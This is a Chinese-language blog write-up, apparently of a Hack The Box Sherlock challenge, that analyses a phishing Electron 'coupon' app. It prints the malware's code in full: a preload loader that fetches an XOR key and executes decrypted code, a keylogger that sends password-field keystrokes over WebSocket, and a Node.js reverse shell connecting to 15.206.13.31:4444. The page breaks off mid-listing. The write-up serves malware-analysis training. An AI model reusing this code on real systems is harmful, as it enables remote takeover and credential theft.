<!DOCTYPE html>
<html lang="en">
    <head prefix="og: https://ogp.me/ns#">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>HTB-OpSalwarKameez24-1 Super-Star - Chromos2me&#39;s Blog</title>
  
    <link rel="shortcut icon" href="/favicon.jpg">
  
  
    <link rel='manifest' href='/manifest.json'>
  

  
  
  
  <meta property="og:title" content="HTB-OpSalwarKameez24-1 Super-Star - Chromos2me&#39;s Blog" />
  
  <meta property="og:type" content="article" />
  
  <meta property="og:url" content="http://chromos2me.github.io/2025/03/08/OpSalwarKameez24-1/index.html" />
  
  <meta property="og:image" content="/favicon.png" />
  
  <meta property="og:article:published_time" content="2025-03-07T16:00:00.000Z" />
  
  <meta property="og:article:author" content="Chromos2me" />
  
  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
<link rel="stylesheet" href="/css/components.css">

  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
  
<link rel="stylesheet" href="/css/rainbow-banner.css">

  
  
  
<link rel="stylesheet" href="/css/toc.css">

  
  
  
  
  
<link rel="stylesheet" href="/css/post.css">

  
  
  
  
  

  
<meta name="generator" content="Hexo 7.3.0"></head>
    <body
        data-color-scheme="auto"
        data-uppercase-categories="true"
        
        data-rainbow-banner="true"
        data-rainbow-banner-shown="always"
        data-rainbow-banner-month="6"
        data-rainbow-banner-colors="#e50000,#ff8d00,#ffee00,#008121,#004cff,#760188"
        
        data-config-root="/"
        
        data-toc="true"
        data-toc-max-depth="2"
        
        
    >
        <nav id="theme-nav">
    <div class="inner">
        <a class="title" href="/">Chromos2me&#39;s Blog</a>
        <div class="nav-arrow"></div>
        <div class="nav-items">
            <a class="nav-item nav-item-home" href="/">Home</a>
            
            
            <a class="nav-item" href="/archives">Archives</a>
            
            
            
            <a class="nav-item" href="/categories">Categories</a>
            
            
            
            <a class="nav-item" href="/tags">Tags</a>
            
            
            
            <a class="nav-item" href="/friends">Friends</a>
            
            
            
            <a class="nav-item" href="/about">About</a>
            
            
            
            <a class="nav-item nav-item-github nav-item-icon" href="https://github.com/Chromos2me" target="_blank" aria-label="GitHub">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-search nav-item-icon" href="/search" target="_blank" aria-label="Search">&nbsp;</a>
            
            
        </div>
    </div>
</nav>
        
<article class="post">
    <div class="meta">
        
        <div class="categories text-uppercase">
        
            <a href="/categories/HTB/">HTB</a>
        
        </div>
        

        
        <div class="date" id="date">
            <span>March</span>
            <span>8,</span>
            <span>2025</span>
        </div>
        

        <h1 class="title">HTB-OpSalwarKameez24-1 Super-Star</h1>
    </div>

    <div class="divider"></div>

    <div class="content">
        <h2 id="场景"><a class="markdownIt-Anchor" href="#场景"></a> 场景</h2>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">StoreD Technologies&#x27; customer support team operates tirelessly around the clock in 24/7 shifts to meet customer needs. During the Diwali season, employees have been receiving genuine discount coupons as part of the celebrations. However, this also presented an opportunity for a threat actor to distribute fake discount coupons via email to infiltrate the organization&#x27;s network. One of the employees received a suspicious email, triggering alerts for enumeration activities following a potential compromise. The malicious activity was traced back to an unusual process. The Incident Response Team has extracted the malicious binaries and forwarded them to the reverse engineering team for further analysis. This is a warning that this Sherlock includes software that is going to interact with your computer and files. This software has been intentionally included for educational purposes and is NOT intended to be executed or used otherwise. Always handle such files in isolated, controlled, and secure environments. One the Sherlock zip has been unzipped, you will find a DANGER.txt file. Please read this to proceed.</span><br></pre></td></tr></table></figure>
<h2 id="题目"><a class="markdownIt-Anchor" href="#题目"></a> 题目</h2>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="bullet">1.</span> What is the process name of malicious NodeJS application?</span><br><span class="line"></span><br><span class="line"><span class="bullet">2.</span> Which option has the attacker enabled in the script to run the malicious Node.js application?</span><br><span class="line"></span><br><span class="line"><span class="bullet">3.</span> What protocol and port number is the attacker using to transmit the victim&#x27;s keystrokes?</span><br><span class="line"></span><br><span class="line"><span class="bullet">4.</span> What XOR key is the attacker using to decode the encoded shellcode?</span><br><span class="line"></span><br><span class="line"><span class="bullet">5.</span> What is the IP address, port number and process name encoded in the attacker payload ?</span><br><span class="line"></span><br><span class="line"><span class="bullet">6.</span> What are the two commands the attacker executed after gaining the reverse shell?</span><br><span class="line"></span><br><span class="line"><span class="bullet">7.</span> Which Node.js module and its associated function is the attacker using to execute the shellcode within V8 Virtual Machine contexts?</span><br><span class="line"></span><br><span class="line"><span class="bullet">8.</span> Decompile the bytecode file included in the package and identify the Win32 API used to execute the shellcode.</span><br></pre></td></tr></table></figure>
<p>在虚拟机中解压附件，得到<code>Electron-Coupon</code>（这里的翻译为电子优惠卷）可执行程序和<code>opsk1.pcap</code>这个流量包，我们根据题目背景可以推断出攻击者的攻击路径为利用虚假的电子优惠卷exe进行钓鱼，之后进行后渗透利用</p>
<p>根据恶意可执行文件的名称，我们可以猜测它是使用<code>Electron</code>框架进行构建的</p>
<blockquote>
<p>Electron是一个用于构建跨平台桌面应用程序的开源框架，它基于Chromium（浏览器内核）和Node.js（后端运行时），允许开发者使用HTML、CSS 和 JavaScript来创建桌面应用。</p>
</blockquote>
<p>我们循着这个思路可以猜测攻击者利用<code>Electron-builder</code>里的打包工具对载荷进行打包，我们之后需要对<code>Electron-Coupon</code>进行解包</p>
<blockquote>
<p><strong>关于如何识别Electron打包程序</strong></p>
<p>将exe后缀改为zip，然后尝试利用解压缩文件打开，然后观察压缩文件中是不是存在resources目录，目录下有一个app.asar文件，满足这些条件说明这是一个Electron打包程序</p>
<p>利用<a target="_blank" rel="noopener" href="https://github.com/electron/asar/%E8%BF%99%E4%B8%AA%E5%B7%A5%E5%85%B7%E8%A7%A3%E5%8C%85%EF%BC%8C%E9%9C%80%E8%A6%81%E9%85%8D%E7%BD%AEnpm%E7%8E%AF%E5%A2%83">https://github.com/electron/asar/这个工具解包，需要配置npm环境</a></p>
</blockquote>
<p>观察zip中存在可执行程序，我们直接解压提取出来exe和dll</p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250307180345.png" alt="微信截图_20250307180345"></p>
<p>很明显恶意行为的产生是来自程序<code>Coupon.exe</code></p>
<p>之后我们在<code>resources</code>目录下找到<code>app.asar</code>，我们利用上面提到的工具进行解包</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">asar e Electron-Coupon.exe ./unpacked</span><br></pre></td></tr></table></figure>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250307183600.png" alt="微信截图_20250307183600"></p>
<blockquote>
<p><code>asar</code>文件结构中重要的部分解释如下：</p>
<p><code>package.json</code>：Electron应用的配置文件，包含应用名称、入口文件、依赖项、脚本等信息。</p>
<p><code>extraResources</code>：存放外部资源（不会被打包进 <code>app.asar</code>），例如额外的配置文件（<code>.json</code>、<code>.yaml</code>），图片、音频、视频等媒体文件等，存放 <code>preload.js</code> 预加载脚本，存放第三方二进制文件（如 Python、Go、Rust 生成的可执行文件）</p>
<p><code>node_modules</code>：是Node.js项目中用于存放所有安装的依赖包的文件夹，所有的第三方库都会被下载到 <code>node_modules</code> 目录中</p>
<p><code>public</code>：通常用于存放 <strong>静态资源</strong>，例如 HTML、CSS、JavaScript 文件，以及图片、字体等</p>
</blockquote>
<p>这个打包文件的配置文件如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;name&quot;</span>: <span class="string">&quot;Coupon&quot;</span>,</span><br><span class="line">  <span class="string">&quot;version&quot;</span>: <span class="string">&quot;1.0.0&quot;</span>,</span><br><span class="line">  <span class="string">&quot;description&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">  <span class="string">&quot;main&quot;</span>: <span class="string">&quot;index.js&quot;</span>,</span><br><span class="line">  <span class="string">&quot;author&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">  <span class="string">&quot;license&quot;</span>: <span class="string">&quot;ISC&quot;</span>,</span><br><span class="line">  <span class="string">&quot;dependencies&quot;</span>: &#123;</span><br><span class="line">    <span class="string">&quot;bytenode&quot;</span>: <span class="string">&quot;^1.5.6&quot;</span>,</span><br><span class="line">    <span class="string">&quot;ffi-napi&quot;</span>: <span class="string">&quot;^4.0.3&quot;</span>,</span><br><span class="line">    <span class="string">&quot;ref-napi&quot;</span>: <span class="string">&quot;^3.0.3&quot;</span></span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="string">&quot;postinstall&quot;</span>: <span class="string">&quot;electron-builder install-app-deps&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们在<code>index.js</code>下找到项目入口文件</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> &#123; app, <span class="title class_">BrowserWindow</span> &#125; = <span class="built_in">require</span>(<span class="string">&#x27;electron&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> &#123; exec &#125; = <span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> path = <span class="built_in">require</span>(<span class="string">&#x27;path&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> mainWindow = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="comment">//const powershell = fs.readFileSync(`C:\\Users\\Public\\test.txt`, &#x27;utf8&#x27;, data =&gt; data);</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">createWindow</span>(<span class="params"></span>) &#123;</span><br><span class="line">    mainWindow = <span class="keyword">new</span> <span class="title class_">BrowserWindow</span>(&#123; <span class="attr">width</span>: <span class="number">800</span>, <span class="attr">height</span>: <span class="number">600</span>,</span><br><span class="line">	  <span class="attr">webPreferences</span>: &#123;</span><br><span class="line">		<span class="attr">contextIsolation</span>: <span class="literal">false</span>,</span><br><span class="line">		<span class="attr">nodeIntegration</span>: <span class="literal">true</span>,</span><br><span class="line">		<span class="attr">nodeIntegrationInWorker</span>: <span class="literal">true</span>,</span><br><span class="line">		<span class="attr">preload</span>: path.<span class="title function_">resolve</span>(<span class="string">`<span class="subst">$&#123;process.resourcesPath&#125;</span>/../extraResources/preload.js`</span>)</span><br><span class="line">	&#125;&#125;);</span><br><span class="line">    mainWindow.<span class="title function_">loadFile</span>(<span class="string">`<span class="subst">$&#123;__dirname&#125;</span>/public/testPage.html`</span>);</span><br><span class="line">    mainWindow.<span class="title function_">on</span>(<span class="string">&#x27;closed&#x27;</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">        mainWindow = <span class="literal">null</span>;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//path.resolve(`$&#123;__dirname&#125;/preload.js`)</span></span><br><span class="line"><span class="comment">//fork(powershell);</span></span><br><span class="line"></span><br><span class="line">app.<span class="title function_">on</span>(<span class="string">&#x27;ready&#x27;</span>, createWindow);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">on</span>(<span class="string">&#x27;window-all-closed&#x27;</span>, <span class="function">() =&gt;</span> process.<span class="property">platform</span> !== <span class="string">&#x27;darwin&#x27;</span> &amp;&amp; app.<span class="title function_">quit</span>());</span><br><span class="line"><span class="comment">// re-create a window on mac</span></span><br><span class="line">app.<span class="title function_">on</span>(<span class="string">&#x27;activate&#x27;</span>, <span class="function">() =&gt;</span> mainWindow === <span class="literal">null</span> &amp;&amp; <span class="title function_">createWindow</span>());</span><br></pre></td></tr></table></figure>
<blockquote>
<p>上面的代码主要用于创建一个窗口，但是里面隐藏了用于RCE的不安全配置</p>
<p><code>contextIsolation: false</code>：关闭上下文隔离，会让 <code>preload</code> 脚本和 <code>web</code> 页面运行在相同的 JavaScript 作用域中从而可以直接修改 <code>window</code> 对象</p>
<p><code>nodeIntegration: true</code>：允许 <code>Electron</code> 的渲染进程直接使用 <code>Node.js</code> API，这意味着网页中的 JavaScript 代码可以访问 Node.js 模块，具有极高的权限，会导致RCE</p>
<p><code>nodeIntegrationInWorker: true</code>：允许 <code>Web Workers</code>（网页工作线程）中也能使用 <code>Node.js</code> API</p>
<p><code>preload: path.resolve()</code>：在网页加载前执行的预加载脚本</p>
</blockquote>
<p>下面是<code>preload.js</code> 脚本</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typeof</span> <span class="built_in">require</span> === <span class="string">&#x27;function&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">window</span>.<span class="property">runShell</span> = <span class="keyword">function</span>(<span class="params"></span>)&#123;</span><br><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">&#x27;http&#x27;</span>)</span><br><span class="line"><span class="keyword">var</span> vm = <span class="built_in">require</span>(<span class="string">&quot;vm&quot;</span>);</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">&quot;fs&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> options = &#123;</span><br><span class="line">  <span class="attr">host</span>: <span class="string">&#x27;0.0.0.0&#x27;</span>,</span><br><span class="line">  <span class="attr">port</span>: <span class="number">80</span>,</span><br><span class="line">  <span class="attr">path</span>: <span class="string">&#x27;/&#x27;</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">http.<span class="title function_">get</span>(options, <span class="keyword">function</span>(<span class="params">res</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> body = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">  res.<span class="title function_">on</span>(<span class="string">&#x27;data&#x27;</span>, <span class="keyword">function</span>(<span class="params">chunk</span>) &#123;</span><br><span class="line">    body += chunk;</span><br><span class="line">  &#125;);</span><br><span class="line">  res.<span class="title function_">on</span>(<span class="string">&#x27;end&#x27;</span>, <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">var</span> b64string = <span class="string">&quot;xHiVWo9qiVuCNslP4RTAFMw+llWePo5RmD7dFJ57kUGFbIUcznCFQM43zDnmPsAUzD7AFMx9kBTRPpJRnWuJRok2wleEd4xQs26SW497k0fON8w55j7AFMw+wBTMbYgU0T6DRMJtkFWbcMgWj3OEGolmhRbAPrtpxSXtPsw+wBSaf5IUj3KJUYJqwAnMcIVDzHCFQMJNj1eHe5QcxSXtPsw+wBSPcolRgmrOV4NwjlGPasgA2CrUGMw80QHCLNACwi/TGt8vwhjMeJVaj2qJW4I2yU/hFMAUzD7AFMw+g1iFe45Awm6JRIk2k1zCbZRQhXDJD+EUwBTMPsAUzD6TXMJtlFCDa5QanHeQUcR9jF2JcJQd1xPqFMw+wBTMPsBHhDCTQIh7kkbCbolEiTaDWIV7jkDFJe0+zD7AFJE32znmPsAUzGyFQJlsjhTDf88PzDHPFLxshUKJcJRHzGqIUcxQj1CJMIpHzH+QRIB3g1WYd49azHiPRoE+g0aNbYhdgnntPpE3yB3X&quot;</span>;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">var</span> str = <span class="title class_">Buffer</span>.<span class="title function_">from</span>(b64string, <span class="string">&#x27;base64&#x27;</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">let</span> keyBuf = <span class="title class_">Buffer</span>.<span class="title function_">from</span>(body, <span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">	<span class="keyword">let</span> strBuf = <span class="title class_">Buffer</span>.<span class="title function_">from</span>(str, <span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">	<span class="keyword">let</span> outBuf = <span class="title class_">Buffer</span>.<span class="title function_">alloc</span>(strBuf.<span class="property">length</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">let</span> n = <span class="number">0</span>; n &lt; strBuf.<span class="property">length</span>; n++)</span><br><span class="line">		outBuf[n] = strBuf[n] ^ keyBuf[n % keyBuf.<span class="property">length</span>]</span><br><span class="line"></span><br><span class="line">	<span class="comment">//console.log(outBuf.toString())</span></span><br><span class="line">	<span class="keyword">var</span> code = outBuf.<span class="title function_">toString</span>()</span><br><span class="line">	<span class="keyword">var</span> script = <span class="keyword">new</span> vm.<span class="title class_">Script</span>(code);</span><br><span class="line">	<span class="keyword">var</span> context = vm.<span class="title function_">createContext</span>(&#123; <span class="attr">require</span>: <span class="built_in">require</span> &#125;);</span><br><span class="line"></span><br><span class="line">	script.<span class="title function_">runInNewContext</span>(context);</span><br><span class="line">	</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;).<span class="title function_">on</span>(<span class="string">&#x27;error&#x27;</span>, <span class="keyword">function</span>(<span class="params">e</span>) &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;Got error: &quot;</span> + e.<span class="property">message</span>);</span><br><span class="line">&#125;);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>简单分析可知预加载脚本的作用是<strong>从远程服务器获取异或密钥，解密一个 Base64 编码的字符串，并执行解密后的 JavaScript 代码</strong></p>
<p>在public目录下存放了攻击者用来进行钓鱼的页面</p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250308162026.png" alt="微信截图_20250308162026"></p>
<p>但是这里的账户和密码在输入之后的处理程序却是一个<code>keylogger</code>，具体代码如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typeof</span> <span class="built_in">require</span> === <span class="string">&#x27;undefined&#x27;</span>;</span><br><span class="line"><span class="title function_">runShell</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="string">&quot;WebSocket&quot;</span> <span class="keyword">in</span> <span class="variable language_">window</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">var</span> socket = <span class="keyword">new</span> <span class="title class_">WebSocket</span>(<span class="string">&quot;ws://0.0.0.0:44500&quot;</span>);</span><br><span class="line">  <span class="keyword">var</span> all_input_fields = <span class="variable language_">document</span>.<span class="title function_">getElementsByTagName</span>(<span class="string">&quot;input&quot;</span>);</span><br><span class="line">  <span class="keyword">var</span> page_url = <span class="variable language_">document</span>.<span class="property">baseURI</span>;</span><br><span class="line">  <span class="keyword">var</span> now = <span class="title class_">Date</span>();</span><br><span class="line"></span><br><span class="line">  socket.<span class="property">onopen</span> = <span class="keyword">function</span>(<span class="params"></span>)</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> (all_input_fields.<span class="property">length</span> &gt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      socket.<span class="title function_">send</span>(<span class="string">&quot;\n\n --------------- &quot;</span> + now + <span class="string">&quot; --------------- &quot;</span>);</span><br><span class="line">      socket.<span class="title function_">send</span>(<span class="string">&quot;\nURL: &quot;</span> + page_url + <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">      <span class="keyword">var</span> all = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; all_input_fields.<span class="property">length</span>; i++)</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ((all_input_fields[i].<span class="property">type</span>.<span class="title function_">toLowerCase</span>() == <span class="string">&quot;text&quot;</span>) || (all_input_fields[i].<span class="property">type</span>.<span class="title function_">toLowerCase</span>() == <span class="string">&quot;password&quot;</span>))</span><br><span class="line">        &#123;</span><br><span class="line">          all_input_fields[i].<span class="property">onfocus</span> = <span class="keyword">function</span>(<span class="params"></span>)</span><br><span class="line">          &#123;</span><br><span class="line">            socket.<span class="title function_">send</span>(<span class="string">&quot;\n##########\n&quot;</span> + <span class="variable language_">this</span>.<span class="property">name</span> + <span class="string">&quot; --&gt; &quot;</span>);</span><br><span class="line">          &#125;</span><br><span class="line"></span><br><span class="line">          all_input_fields[i].<span class="property">onkeydown</span> = <span class="keyword">function</span>(<span class="params">sniffed_key</span>)</span><br><span class="line">          &#123;</span><br><span class="line">            socket.<span class="title function_">send</span>(sniffed_key.<span class="property">keyCode</span>);</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  socket.<span class="property">onbeforeunload</span> = <span class="keyword">function</span>(<span class="params"></span>)</span><br><span class="line">  &#123;</span><br><span class="line">    socket.<span class="title function_">close</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><strong>监听网页上的文本输入框和密码输入框的按键输入，并通过 WebSocket 将按键数据发送到远程服务器</strong>（<code>ws://0.0.0.0:44500</code>），实现键盘记录</p>
<p>接下来打开流量包，我们寻找一下异或的密钥，这里因为密钥传输使用的是HTTP协议，我们过滤一下HTTP流量，在GET请求的返回包中我们找到密钥<code>ec1ee034ec1ee034</code></p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250308163929.png" alt="微信截图_20250308163929"></p>
<p>我们利用cyberchef解密一下shellcode</p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250308164207.png" alt="微信截图_20250308164207"></p>
<p>完整的shellcode如下，实际上就是一个Node.js的反弹shell，我们可以简单的提取出攻击者服务器IP和开放端口</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">function</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">var</span> net = <span class="built_in">require</span>(<span class="string">&quot;net&quot;</span>),</span><br><span class="line">        cp = <span class="built_in">require</span>(<span class="string">&quot;child_process&quot;</span>),</span><br><span class="line">        sh = cp.<span class="title function_">spawn</span>(<span class="string">&quot;cmd.exe&quot;</span>, []);</span><br><span class="line">    <span class="keyword">var</span> client = <span class="keyword">new</span> net.<span class="title class_">Socket</span>();</span><br><span class="line">    client.<span class="title function_">connect</span>(<span class="number">4444</span>, <span class="string">&quot;15.206.13.31&quot;</span>, <span class="keyword">function</span>(<span class="params"></span>)&#123;</span><br><span class="line">        client.<span class="title function_">pipe</span>(sh.<span class="property">stdin</span>);</span><br><span class="line">        sh.<span class="property">stdout</span>.<span class="title function_">pipe</span>(client);</span><br><span class="line">        sh.<span class="property">stderr</span>.<span class="title function_">pipe</span>(client);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="keyword">return</span> <span class="regexp">/a/</span>; <span class="comment">// Prevents the Node.js application form crashing</span></span><br><span class="line">&#125;)();</span><br></pre></td></tr></table></figure>
<p>在获取的流量包中追踪TCP流，查找攻击者执行的命令</p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250308164928.png" alt="微信截图_20250308164928"></p>
<p>恶意代码在Nodejs的vm模块下的runInNewContext函数中执行</p>
<p><img src="/2025/03/08/OpSalwarKameez24-1/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20250308165401.png" alt="微信截图_20250308165401"></p>
<p>我们尝试反编译一下public目录下的字节码文件<code>script.jsc</code>，我们将利用<a target="_blank" rel="noopener" href="https://github.com/suleram/View8">view8</a></p>
<blockquote>
<p><strong>JSC 文件</strong> 是JavaScript 编译文件，通常是 JavaScript 代码的 字节码版本。这些文件可以由 JavaScript 引擎（如 V8、JavaScriptCore）生成，用于提升代码执行效率，或者保护源代码免遭直接查看。</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python view8.py C:\Users\lenovo\Desktop\Electron<span class="literal">-Coupon</span>\resources\unpacked\extraResources\script.jsc script.txt</span><br></pre></td></tr></table></figure>
<p>反编译之后的代码如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span 